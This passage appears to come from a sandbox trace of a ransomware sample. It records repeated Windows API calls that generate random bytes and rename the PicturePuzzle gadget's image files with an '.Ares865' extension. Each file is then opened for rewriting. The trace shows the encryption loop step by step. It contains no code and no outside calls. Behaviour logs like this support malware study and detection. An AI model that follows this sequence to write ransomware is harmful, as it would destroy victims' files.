szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.050] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.050] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.054] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.054] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.054] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.055] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\6.png.Ares865") returned 88 [0118.055] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\6.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\6.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\6.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\6.png.ares865"), dwFlags=0x1) returned 1 [0118.057] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\6.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\6.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.057] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28448) returned 1 [0118.058] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.058] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.058] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.062] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.063] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.063] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.064] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\7.png.Ares865") returned 88 [0118.064] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\7.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\7.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\7.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\7.png.ares865"), dwFlags=0x1) returned 1 [0118.065] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\7.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\7.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.066] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18747) returned 1 [0118.066] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.066] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.066] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.072] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.073] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.073] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.074] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\8.png.Ares865") returned 88 [0118.074] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\8.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\8.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\8.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\8.png.ares865"), dwFlags=0x1) returned 1 [0118.076] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\8.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\8.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.076] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=21159) returned 1 [0118.076] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.077] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.077] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.083] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.086] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.086] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.098] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\9.png.Ares865") returned 88 [0118.099] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\9.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\9.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\9.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\9.png.ares865"), dwFlags=0x1) returned 1 [0118.100] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\9.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\9.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.101] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=21275) returned 1 [0118.101] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.101] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.102] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.106] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.107] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.107] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.108] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\background.png.Ares865") returned 97 [0118.108] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\background.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\background.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\background.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\background.png.ares865"), dwFlags=0x1) returned 1 [0118.110] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\background.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\background.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.110] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18089) returned 1 [0118.110] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.111] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.111] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.116] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.117] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.117] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.118] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\daisies.png.Ares865") returned 94 [0118.118] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\daisies.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\daisies.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\daisies.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\daisies.png.ares865"), dwFlags=0x1) returned 1 [0118.119] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\daisies.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\daisies.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.119] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=41941) returned 1 [0118.119] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.120] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.120] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.126] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.127] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.127] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.128] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\glow.png.Ares865") returned 91 [0118.128] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\glow.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\glow.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\glow.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\glow.png.ares865"), dwFlags=0x1) returned 1 [0118.140] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\glow.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\glow.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.140] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=233) returned 1 [0118.140] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.141] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.141] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.144] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.144] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.144] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.145] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\hint_down.png.Ares865") returned 96 [0118.145] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\hint_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\hint_down.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\hint_down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\hint_down.png.ares865"), dwFlags=0x1) returned 1 [0118.146] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\hint_down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\hint_down.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.147] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3445) returned 1 [0118.147] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.147] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.148] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.150] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.150] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.150] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.151] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\hint_over.png.Ares865") returned 96 [0118.151] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\hint_over.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\hint_over.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\hint_over.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\hint_over.png.ares865"), dwFlags=0x1) returned 1 [0118.153] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\hint_over.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\hint_over.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.153] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3332) returned 1 [0118.153] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.154] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.154] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.156] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.157] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.157] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.157] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\hint_up.png.Ares865") returned 94 [0118.157] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\hint_up.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\hint_up.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\hint_up.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\hint_up.png.ares865"), dwFlags=0x1) returned 1 [0118.159] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\hint_up.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\hint_up.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.159] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3381) returned 1 [0118.159] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.160] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.160] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.163] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.163] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.163] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.164] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_bottom.png.Ares865") returned 106 [0118.164] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_bottom.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_bottom.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_bottom.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_bottom.png.ares865"), dwFlags=0x1) returned 1 [0118.166] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_bottom.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_bottom.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.166] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=140) returned 1 [0118.166] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.167] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.167] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.169] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.170] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.170] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.171] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_divider_left.png.Ares865") returned 112 [0118.171] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_divider_left.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_divider_left.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_divider_left.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_divider_left.png.ares865"), dwFlags=0x1) returned 1 [0118.173] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_divider_left.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_divider_left.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.173] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=135) returned 1 [0118.173] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.174] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.174] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.176] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.177] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.177] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.177] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_divider_right.png.Ares865") returned 113 [0118.178] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_divider_right.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_divider_right.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_divider_right.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_divider_right.png.ares865"), dwFlags=0x1) returned 1 [0118.179] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_divider_right.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_divider_right.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.179] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=135) returned 1 [0118.180] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.180] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.180] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.183] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.184] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: 